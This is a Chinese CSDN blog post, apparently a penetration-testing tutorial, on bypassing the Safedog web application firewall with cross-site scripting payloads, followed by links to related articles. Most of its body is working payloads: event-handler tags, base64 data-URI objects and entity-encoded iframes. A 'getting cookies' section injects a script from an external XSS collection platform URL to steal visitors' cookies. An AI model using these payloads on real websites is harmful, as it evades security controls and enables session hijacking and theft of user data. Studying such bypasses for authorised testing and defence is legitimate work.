xss过waf(以安全狗为例)

最新推荐文章于 2024-09-12 03:38:19 发布
最新推荐文章于 2024-09-12 03:38:19 发布
阅读量1.3k 收藏 4
点赞数 2
分类专栏: 渗透测试 bypass 文章标签: 安全 xss javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42383069/article/details/123419621
版权

xss过waf(以安全狗为例)

0x01. Bypass原理:
**原理:**我们知道安全狗会检测一些常见的XSS测试关键词,比如script、alert等。我们可以找到一些效果跟script、alert一样的,且未被安全狗拦截的语句去执行JS语句

  1. 测试script标签被拦截:
    在这里插入图片描述

0x02. Bypass安全狗:
1)测试标签,弹窗测试,成功弹窗

<img src=x onerror=alert(/img/)>

在这里插入图片描述
2)测试prompt(用于显示可提示用户进行输入的对话框,可在alert被禁用的情况下代替)

<img src=x onerror=prompt(/img/)>

在这里插入图片描述3)测试video标签

<video src=x onerror=alert(/video/)>

在这里插入图片描述

4)测试audio标签

<audio src=x onerror=alert(/audio/)>

在这里插入图片描述
5)测试button标签点击事件

<button onclick=alert(1)>xss</button>

在这里插入图片描述
6)测试object标签搭配base64加密

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgvb2JqZWN0Lyk8L3NjcmlwdD4="></object>
base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg    
      解码:<script>alert(1)</script>

在这里插入图片描述
7)测试iframe标签

&lt 表示左半括号 < 
&gt 表示右半括号 >
<iframe src="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>

在这里插入图片描述
0x03. 测试拿cookie
1)利用img标签执行js:

document.createElement('script'):创建元素动态插入script 
appendChild:方法向节点添加最后一个子节点
<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="xss平台url">

在这里插入图片描述
1.2) 查看获取的数据:
在这里插入图片描述
2)利用object 标签执行js:

<object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cHM6Ly94c3PlubPlj7B1cmw+PC9zY3JpcHQ+"></object>
解密:<script src=https://xss平台url></script>

在这里插入图片描述
2.2) 查看获取的数据:
在这里插入图片描述

Beyond My
关注
专栏目录
XSSWAF总结
afei001
05-22 334
目录 1.大佬XSS绕过WAF文章 2.on*事件相关属性 1.大佬XSS绕过WAF文章 2020年仍然有效的一些XSS Payload:https://zhuanlan.zhihu.com/p/107860601 XSS过滤器绕过总结:https://www.imzzj.com/2020/05/14/xss-guo-lu-qi-rao-guo-zong-jie.html XSS挑战之旅学习总结:https://www.secpulse.com/archives/59497.html .
安全测试之XSS绕过姿势总结
LYX_WIN
06-15 382
xss test
xss常见问题
2301_78459568的博客
07-12 116
1)反射型xss,被称为非持久型xss,当用户访问一个带有xss代码的html请求时,服务端接受并把数据发送到浏览器,浏览器解析这段带有xss代码的数据后,就形成了xss漏洞。2)存储型xss,被称为持久性xss,是最危险的一种漏洞 会把用户输入的数据存储在服务器端,当用户点击带有xss代码的页面时,恶意xss代码就会执行。对用户输入的代码没有做合理的过滤,导致攻击者构造的字符输出到前端的时候,被浏览器作为有效的攻击代码执行。xss又被称为跨站脚本攻击,主要是基于js来实现的,又被称为来自前端的漏洞。
XSS绕过WAF的姿势
weixin_34112208的博客
05-16 427
初始测试 1.使用无害的payload,类似<b>,<i>,<u> 观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等; 2.如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应; 3.尝试以下payload <script>prompt(1)<...
WAF相关知识及安全狗的部署和绕过_安全狗waf拦截规则
最新发布
2401_86951318的博客
09-12 771
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
xss绕过waf
None安全团队
04-28 1155
前言 360主机卫士是360旗下的服务器安全软件,为站长免费提供网站后门检测、木马查杀,网站补丁、漏洞防护等服务… (虽然软件几年前就停止更新,官网挂了,但是从当时的评论上看软件还是很不错的。) 环境 火狐 360主机卫士Apache版 phpStudy2016(PHP-5.4.45+Apache) 测试代码 <?php $input = @$_REQUEST["xss"]; echo "<div>".$input."</div>" ?> 测试 习惯性的
东塔攻防世界—xss绕过安全狗
内心不种满鲜花就会长满杂草
06-28 1219
东塔攻防世界—xss绕过安全狗
xsswaf的小姿势,网络安全内存优化面试题
uiuuyy67的博客
04-15 279
可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以看见是和我们想的一样 获取svg第一行第一个id的值然后base64解码 并输出 用eval就可以执行alert的操作。然后已经知道eval是用来执行操作的window[‘ev’+‘al’]是将eval拆分类似self。是用什么操作我们用console.log看看他输出的是不是我们理解的意思 这里在payload加上。这里payload的意思是将eval拆分然后解码执行svg标签里的内容 解读如下。这里的脏字符是换行的意思。
XSS绕过安全狗WAF
永远是少年
11-25 3067
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS绕过安全狗WAF。 一、测试环境搭建 二、XSS绕过安全狗WAF
xss_waf绕过
weixin_44110913的博客
08-21 1709
写在前面: ————————————————————————————————————————————————— 当你的才华 还撑不起的野心时 那你就应该静下心来学习 ————————————————————————————————————————————————— 第一次翻译长篇文档,如有疏漏还请各位大牛指正。OWASP的这篇速查表虽然时间比较久了,但还在更新,所以还是翻译出来了。翻译完发现里...
XSS绕过waf
m0_52813136的博客
07-28 1339
XSS绕过waf靶机
第28天:WEB漏洞-XSS跨站之WAF绕过及安全修复1
08-03
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
WAF绕过的各种方法总结.pdf
07-09
WAF绕过的各种方法总结总结语2019年7月9日,仅供学习参考,请勿用于非法用途
Web应用防火墙(WAF)在XSS防御中的应用
08-18
然而,WAF并不是万能的,它需要与其他安全措施和最佳实践相结合,以构建全面的安全防护体系。 通过本文的深入探讨,你应该能够了解WAFXSS防御中的作用和配置方法,以及如何将其集成到Web应用的开发和部署流程中。...
XSS现代WAF规则探测及绕过技术
Coisini的博客
06-13 644
初始测试 1、使用无害的payload,类似,,观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等; 2、如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应; 3、尝试以下的payload <script>alert(1);</script> <script>promp...
XSS漏洞介绍以及waf绕过
weixin_58052886的博客
06-27 1639
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。主要在于程序对输入和输出的控制不够严格,导致攻击者在将script代码输入后,在前端浏览器被当作有效代码解析并执行从而产生危害。
XSS测试绕过WAF思路
永远是少年
11-26 1422
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS测试绕过WAF思路。 一、XSS测试绕过WAF思路 二、常见XSS可替换标签
XSS之绕过简单WAF总结
weixin_50464560的博客
08-01 2287
https://www.cnblogs.com/wjrblogs/p/12341190.html 一、一般测试方法# 步骤: 0.总则:见框就插 1.在输入框随便输入一些简单的字符,如 aaa,方便后续查找输出位置 2.按下F12打开开发者模式,ctrl+F键,搜索 aaa 3.多数情况下是在标签的value="aaa"中,或者独立出来包含在一些别的标签中,如div、span等 4.根据特定情况构造payload,一般是直接构造标签或者闭合标签再构造或者利用伪协议等 二、常用技巧# 1.JS伪协议利用 形式
绕过WAFXSS语句
focus on security
02-25 2308
吐血整理转载请说明。 原文收集于OWASPXSS_Filter_Evasion_Cheat_Sheet https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet http://ha.ckers.org/xss.html 正文: XSS JavaScript injection: <SCRIPT SRC=ht...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值